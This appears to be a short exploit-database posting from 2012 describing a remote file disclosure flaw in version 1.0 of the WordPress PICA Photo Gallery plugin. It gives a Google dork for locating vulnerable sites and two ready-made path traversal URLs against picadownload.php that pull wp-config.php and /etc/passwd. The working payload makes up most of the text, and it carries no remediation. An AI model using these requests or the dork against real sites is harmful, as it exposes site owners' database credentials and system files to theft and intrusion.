WordPress PICA Photo Gallery plugin version 1.0 suffers from a remote file disclosure vulnerability.
ca9dd440e85c6f330d7e19bb85155495d7d6cb8e64317a02d87ba7ae8c134190
##################################################
# Description : Wordpress Plugins - PICA Photo Gallery Remote File
Disclosure Vulnerability
# Version : 1.0
# Link : http://wordpress.org/extend/plugins/pica-photo-gallery/
# Plugins : http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/pica-photo-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd